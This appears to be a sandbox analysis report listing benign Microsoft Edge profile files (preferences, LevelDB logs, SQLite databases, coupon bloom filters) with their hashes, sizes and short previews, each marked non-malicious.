                                                                                                                                                                                                                                                                                                                        Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378326025114093","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340961151815957","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000001.dbtmp

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                        MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                        SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                        SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                        SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\000003.log

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):33
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                                                                                                                        MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                                                                                                                        SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                                                                                                                        SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                                                                                                                        SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:...m.................DB_VERSION.1

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\CURRENT (copy)

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                        MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                        SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                        SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                        SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\LOG

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):313
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.167301102230897
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:6:7L+glm3M1N723oH+Tcwtp3hBtB2KLlpL+jMq2PN723oH+Tcwtp3hBWsIFUv:7c3saYebp3dFLTQMvVaYebp3eFUv
                                                                                                                                                                                                                                                                                                                        MD5:D91A830BB54EF6AC59051EA0B685CA7F
                                                                                                                                                                                                                                                                                                                        SHA1:A96A6160A6EE75AB97E8407EB8498F12D1BD5EC2
                                                                                                                                                                                                                                                                                                                        SHA-256:730294AEE65EABDDD90DFDF03F8F278948534CBD998BF8B64A2749452D646501
                                                                                                                                                                                                                                                                                                                        SHA-512:86847040BB77A66777AD9712EEFB505240C2A0B655553241AAB8FBFA0AEE3AD95FD9EB3DEE8678482984EA698B6BBA1E91705B700AF6F30665A489EF6DA7C596
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:2024/12/10-12:40:30.183 1ea4 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/12/10-12:40:30.230 1ea4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\MANIFEST-000001

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):41
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                                        MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                                        SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                                        SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                                        SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                                                                                        Size (bytes):2163821
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.22288081872485
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:IbPMZpVIfI/MXhZSihQgCmnVAEpENU2iOYcafbE2n:IbkZpVIfx2mjF
                                                                                                                                                                                                                                                                                                                        MD5:9715EA84F0851C4D9F6DB8ACBF9CFDCC
                                                                                                                                                                                                                                                                                                                        SHA1:C58F8AF59BCFE99577D5DD7ED59226089F8D0817
                                                                                                                                                                                                                                                                                                                        SHA-256:526EABC4346B3DAC701191F5E7B6B9162FAF15CEA21456396091F5D94E4B2A16
                                                                                                                                                                                                                                                                                                                        SHA-512:5C8A3D071C6D404F5424240ADFD78C0C2EFF48D8CAC78DDE7F211F11096C3AC64BA75531220164A035DC1B6FC1115DA8C384F60BD4E0B37CDFC1654E5C8B6CE0
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:...m.................DB_VERSION.1.f.+.................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340960289901340.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):340
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.062095871571634
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:6:7LULtYAq2PN723oH+Tcwt9Eh1tIFUt8OLULtuRZmw+OL+TVFkwON723oH+Tcwt9O:7utpvVaYeb9Eh16FUt8OutS/+OsVF5Oj
                                                                                                                                                                                                                                                                                                                        MD5:4E5A53D816630EC45399E9B1A28357B4
                                                                                                                                                                                                                                                                                                                        SHA1:D77524DA96363B8C483F7B667EEF4FD604F5035E
                                                                                                                                                                                                                                                                                                                        SHA-256:C8907EF0A78152D8169F731CDDA68970F36B26518D81F76F60EAA4266647B28B
                                                                                                                                                                                                                                                                                                                        SHA-512:C0FAFF4D946088FEDBBC7147B06DEFBF575048430684541DB89EA043FE4A326BE1081943B8660A214D26E1F533A885415E862BAEE0952DBFA309B7F5F8902B61
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:2024/12/10-12:40:29.997 2080 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/10-12:40:29.999 2080 Recovering log #3.2024/12/10-12:40:30.011 2080 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):340
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.062095871571634
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:6:7LULtYAq2PN723oH+Tcwt9Eh1tIFUt8OLULtuRZmw+OL+TVFkwON723oH+Tcwt9O:7utpvVaYeb9Eh16FUt8OutS/+OsVF5Oj
                                                                                                                                                                                                                                                                                                                        MD5:4E5A53D816630EC45399E9B1A28357B4
                                                                                                                                                                                                                                                                                                                        SHA1:D77524DA96363B8C483F7B667EEF4FD604F5035E
                                                                                                                                                                                                                                                                                                                        SHA-256:C8907EF0A78152D8169F731CDDA68970F36B26518D81F76F60EAA4266647B28B
                                                                                                                                                                                                                                                                                                                        SHA-512:C0FAFF4D946088FEDBBC7147B06DEFBF575048430684541DB89EA043FE4A326BE1081943B8660A214D26E1F533A885415E862BAEE0952DBFA309B7F5F8902B61
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:2024/12/10-12:40:29.997 2080 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/10-12:40:29.999 2080 Recovering log #3.2024/12/10-12:40:30.011 2080 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Collections\collectionsSQLite

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 34, database pages 18, cookie 0x19, schema 4, UTF-8, version-valid-for 34
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):73728
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.4947385728088827
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:96:xR94jweGq2L4H7pgNPdQyoDbel9myJrDVb4:f94ZBS4FgNPdPl9myRDVb4
                                                                                                                                                                                                                                                                                                                        MD5:29C9AF42D59BA452C914D337F83778D8
                                                                                                                                                                                                                                                                                                                        SHA1:0D4075E73B0189BD28D6968499DCFDE5975116CB
                                                                                                                                                                                                                                                                                                                        SHA-256:DFDAE22D17235546DAF4200A5920C46B10E0885D9A0BE747D3DE14F432817613
                                                                                                                                                                                                                                                                                                                        SHA-512:DB03C53D1CC2AE5E1E7882437730454AC27842FE5211A6DBDBBB5131EB0D607DB5D2F26EADB08CD9BAD90FD93D6E04A2C27361FE5BD1B510467D2E9BAEF90FBE
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..."..................................................................."..j....................0...{...h.6.~.%...U........................................................................................................................................................................................................................................................................................................................................................................G...##..Utablecollectionscollections.CREATE TABLE collections ( id LONGVARCHAR PRIMARY KEY, date_created REAL NOT NULL, date_modified REAL NOT NULL, title LONGVARCHAR NOT NULL, position INTEGER NOT NULL, is_syncable INTEGER DEFAULT 1, suggestion_url LONGVARCHAR, suggestion_dismissed INTEGER, suggestion_type INTEGER, thumbnail BLOB, is_custom_thumbnail INTEGER NOT NULL DEFAULT 0, tag LONGVARCHAR, thumbnail_url LONGVARCHAR, is_marked_for_deletion INTEGER)..........tableitemsitems.CREATE TABLE items

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DIPS

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):28672
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.43508159006069336
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBI:TouQq3qh7z3bY2LNW9WMcUvB
                                                                                                                                                                                                                                                                                                                        MD5:F5237AED0F897E7619A94843845A3EC3
                                                                                                                                                                                                                                                                                                                        SHA1:A0C752C9C28A753CFB051AACE2ADA78A6D1288C3
                                                                                                                                                                                                                                                                                                                        SHA-256:D4463972AD7B1582F05C8E17074CE863D45CA625C2C672DB0D37F3AF4C7ACE42
                                                                                                                                                                                                                                                                                                                        SHA-512:D3C9718794E455D415D8EDF23B576E0A70356B8D71B8DD374D25B8065FEF608E114E13395B4B54462739882A141F4DBE00E3A370D6E4160504428A849CC893A3
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DashTrackerDatabase

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):10240
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.8708334089814068
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
                                                                                                                                                                                                                                                                                                                        MD5:92F9F7F28AB4823C874D79EDF2F582DE
                                                                                                                                                                                                                                                                                                                        SHA1:2D4F1B04C314C79D76B7FF3F50056ECA517C338B
                                                                                                                                                                                                                                                                                                                        SHA-256:6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
                                                                                                                                                                                                                                                                                                                        SHA-512:86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\000003.log

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):634858
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.015691041468973
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:EfC7zTsosGXbkcnRXFrshHk0rZkYVTeV89XYr3UHNboOqQnd+Nf3nXXodHUeWEv9:Ef4E9cnRXFQK0rZkF8dKOMi0pXiHRX0q
                                                                                                                                                                                                                                                                                                                        MD5:F788AA50AF1940237D392739DD2F53B1
                                                                                                                                                                                                                                                                                                                        SHA1:7B6C68524813D2072F517195D737CF487FD74F42
                                                                                                                                                                                                                                                                                                                        SHA-256:68AEAA7D72793EA6446A5470D4FA057EE6B796ACC7254FB7CAC39728624ED1A7
                                                                                                                                                                                                                                                                                                                        SHA-512:3014E93C02E4CAB07926A38B7B6AAB89409AE5212C00A103C4F0DB1921DFED20659913DF6AB7BBF71381277C36524014BF467E61A59A48EC405B5236618AB298
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:...m.................DB_VERSION.1l+Vc.................BLOOM_FILTER:..&{"numberOfHashFunctions":8,"shiftBase":7,"bloomFilterArraySize":3757764,"primeBases":[5381,5381,5381,5381],"supportedDomains":"FooHhxhbZru6kGIiP/Bhi1iMyyibrdC7FZ0qO+TcCcU6js0cQkxRJ/gfWlEW1aw/rm5ABm+aO1jwklVAS1ggZRJ9W1z8Hk2p0+/GIrP0BokzC9EFOLLYWaUcAXr0IjRl6cVJdHuRVD2tZd5vncH65m9sR1gUk/5kvw0+zxZfPDZ0DsHYwhnAIgZ7GPetaMX01RwPM6c9pgg7oBOwjz4BEQgEUkGmNo13+sCFt+ScXyXld1+EXCdE4SSBdAInjT+jF037vrJ6sb0Spo28djAJUgWyDFBQ1IhXUjXjsai9j6aCMcH2qfoXbNZwqG0djcP43vgomhm1AXUaKyuCXd1tOVpMJ7XqsVI2fS1LGQlnKGvBYGLANmiF086OCFA42ajy/BFRA9nzox5QggWZZBFABF0a1CLnrMKeZkIWlX4/gNU89JEiEswpL+xWUE8XTTZg0TPzPuB7AiR4xX97XHrLaxtKw54XLhM8W21PylQpjXMbZFUP699eYKAkWCqmmQhUR+0BSBy6NbViy81At96NBSQUDjQXjncLaDaSyG1sUxgKTwSfg5Cflr6HTZmNyTERQVZeIzcOdA7PTnEQZIgLtATmv4fDyH5N5/NKHHa02cQ+cVtvELaMxt7wYyp5kfK8W2dttRskQwuLCEPQ67KaeXE1sRzeLI+WJiAImKEYUS8lFSsglewUb1YcdhNzlIRgvwE3yhmCdOA3vQyaijYErox7S6xUxTWEYe0d1XTDgiwxhB16Dm0shiSuEsretNs0V2rskwbNBoAoROYJ4lZUu6LHX7PfZI1fgTQ

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\000004.log

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):142
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.015319999863179
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:j38E28xp4m3rscUSWOUpCglXlf+nETPxpK2x7L8V0jnBFUOfWcF:j38D8xSEsI/UMgl9+n0PxEWO0jnBuO+4
                                                                                                                                                                                                                                                                                                                        MD5:A9ABF2AA235C8C93370B265B8EB4D69F
                                                                                                                                                                                                                                                                                                                        SHA1:BC15E15EABCC6A7C87906BECC499600DFA761B5E
                                                                                                                                                                                                                                                                                                                        SHA-256:F0F5FAAC83A80A47B1A24FDFA5C58093F2CBBB00455B227F7A6CD431C1E95266
                                                                                                                                                                                                                                                                                                                        SHA-512:FFB870EE91A4FD825CCFC96478EE7B9AFE9D912B602AAAA81FDBFE9DC5B3407C34CC8EC170B08B35B9464DF5BEC89C184BD0A04CA1D920972B6822E7514CBBA2
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:X.z.9................BLOOM_FILTER_EXPIRY_TIME:.1733938839.244527.+C+G................BLOOM_FILTER_LAST_MODIFIED:.Tue, 10 Dec 2024 13:15:31 GMT

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\000005.ldb

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):634833
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.015012816241871
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:EfC7cT5osGxbkHnRLFryhHV0rZUYVTKV8sXYl3UHNbooqQnd+E339XX7dH5eWEvx:Ef4oVHnRLFO/0rZUb8QWOoi04XhHAXa2
                                                                                                                                                                                                                                                                                                                        MD5:7A043B499C88417DAA2A334856FFB224
                                                                                                                                                                                                                                                                                                                        SHA1:CA277F06887073307841CA94AE3172FA575D60CD
                                                                                                                                                                                                                                                                                                                        SHA-256:C30C453876F0C4E8DB1960CBE0280044183C9D7ED9D5D661F3E691391DB86CC1
                                                                                                                                                                                                                                                                                                                        SHA-512:7BA5690EF819CAF93417708ED9A2675BB5A4FFA4944B76FEAF58D91B98C402918069FE4358B17C36664C7CD672CA80C06325B015959573F7F649B0F26F2CA19A
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:....&BLOOM_FILTER:........{"numberOfHashFunctions":8,"shiftBase":7,"bloomFilterArraySize":3757764,"primeBases":[5381,5381,5381,5381],"supportedDomains":"FooHhxhbZru6kGIiP/Bhi1iMyyibrdC7FZ0qO+TcCcU6js0cQkxRJ/gfWlEW1aw/rm5ABm+aO1jwklVAS1ggZRJ9W1z8Hk2p0+/GIrP0BokzC9EFOLLYWaUcAXr0IjRl6cVJdHuRVD2tZd5vncH65m9sR1gUk/5kvw0+zxZfPDZ0DsHYwhnAIgZ7GPetaMX01RwPM6c9pgg7oBOwjz4BEQgEUkGmNo13+sCFt+ScXyXld1+EXCdE4SSBdAInjT+jF037vrJ6sb0Spo28djAJUgWyDFBQ1IhXUjXjsai9j6aCMcH2qfoXbNZwqG0djcP43vgomhm1AXUaKyuCXd1tOVpMJ7XqsVI2fS1LGQlnKGvBYGLANmiF086OCFA42ajy/BFRA9nzox5QggWZZBFABF0a1CLnrMKeZkIWlX4/gNU89JEiEswpL+xWUE8XTTZg0TPzPuB7AiR4xX97XHrLaxtKw54XLhM8W21PylQpjXMbZFUP699eYKAkWCqmmQhUR+0BSBy6NbViy81At96NBSQUDjQXjncLaDaSyG1sUxgKTwSfg5Cflr6HTZmNyTERQVZeIzcOdA7PTnEQZIgLtATmv4fDyH5N5/NKHHa02cQ+cVtvELaMxt7wYyp5kfK8W2dttRskQwuLCEPQ67KaeXE1sRzeLI+WJiAImKEYUS8lFSsglewUb1YcdhNzlIRgvwE3yhmCdOA3vQyaijYErox7S6xUxTWEYe0d1XTDgiwxhB16Dm0shiSuEsretNs0V2rskwbNBoAoROYJ4lZUu6LHX7PfZI1fgTQM9b5ynwn8RuiV+AUFhhp5TmE+7IntErw0HqkBRSrhIgl

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):516
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.2208784638097585
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:12:7K/D+vVaYebn9GFUt8OK/T/+OKGV5OaYebn95Z9pKuf0TDfHKOnlh:7KIVaYeb9ig8OKfKAOaYeb9zLyTjlh
                                                                                                                                                                                                                                                                                                                        MD5:980E6D856F48DEEE34CD1CDAB9608ADC
                                                                                                                                                                                                                                                                                                                        SHA1:F347A537F2E3034C096FBE2170F2D10BA45F8053
                                                                                                                                                                                                                                                                                                                        SHA-256:7AE591C0AC1EFE066325C150B49F7A80E08700CCD41C63370500866058AA969E
